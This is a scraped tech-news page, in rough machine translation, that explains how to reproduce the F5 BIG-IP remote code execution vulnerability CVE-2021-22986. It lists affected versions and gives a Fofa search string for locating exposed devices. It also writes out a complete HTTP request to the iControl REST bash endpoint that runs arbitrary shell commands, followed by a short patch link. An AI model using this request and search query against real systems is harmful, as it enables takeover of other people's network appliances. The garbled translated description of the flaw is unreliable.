Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

How to reproduce the F5 BIG-IP remote code execution vulnerability CVE-2021-22986

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article introduces how to achieve F5 BIG-IP remote code execution vulnerability CVE-2021-22986 reproduction, the content is very detailed, interested friends can refer to, hope to be helpful to you.

F5 BIG-IP

The F5 BIG-IP link controller is used for next-generation WAN link traffic management that maximizes link performance and availability.

Brief introduction of vulnerabilities

F5 BIG-IP has a code execution vulnerability that allows attackers who define authentication to have network access to the iControl REST interface through the BIG-IP administrative interface and their own IP address to execute arbitrary system commands and take control of the target machine.

Affect the version

F5 BIG-IP 16.0.0-16.0.1

F5 BIG-IP 15.1.0-15.1.2

F5 BIG-IP 14.1.0-14.1.3.1

F5 BIG-IP 13.1.0-13.1.3.5

F5 BIG-IP 12.1.0-12.1.5.2

F5 BIG-IQ 7.1.0-7.1.0.2

F5 BIG-IQ 7.0.0-7.0.0.1

F5 BIG-IQ 6.0.0-6.1.0

Loophole recurrence

Fofa search keywords:

Body= "F5 Networks, Inc"

Open the home page as follows:

Construct the request packet and execute any command:

POST / mgmt/tm/util/bash HTTP/1.1Host: 192.168.1.123:8443Connection: closeContent-Length: 39Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Upgrade-Insecure-Requests: 1Content-Type: application/json {"command": "run", "utilCmdArgs": "- c id"}

Repair suggestion

F5 has officially released relevant security updates, and the majority of users need to update to the latest version in time.

Download link:

Https://support.f5.com/csp/article/K02566623

On how to achieve F5 BIG-IP remote code execution vulnerability CVE-2021-22986 repeat to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: Vulnerabilities code links content commands more versions help control updates management yes maximum security next generation key keywords interest availability address vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple NVidia Apple MySQL Shulou Technology vpn macOS Xiaomi Huawei Redmi MariaDB Shulou Tech Info Microsoft Linux Shulou Information OPPO Reno Docker NVidia Apple MySQL Shulou Technology vpn macOS Xiaomi Huawei Redmi MariaDB Shulou Tech Info Microsoft Linux Shulou Information OPPO Reno Docker

Share To

Related

Network Security

More Network Security >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report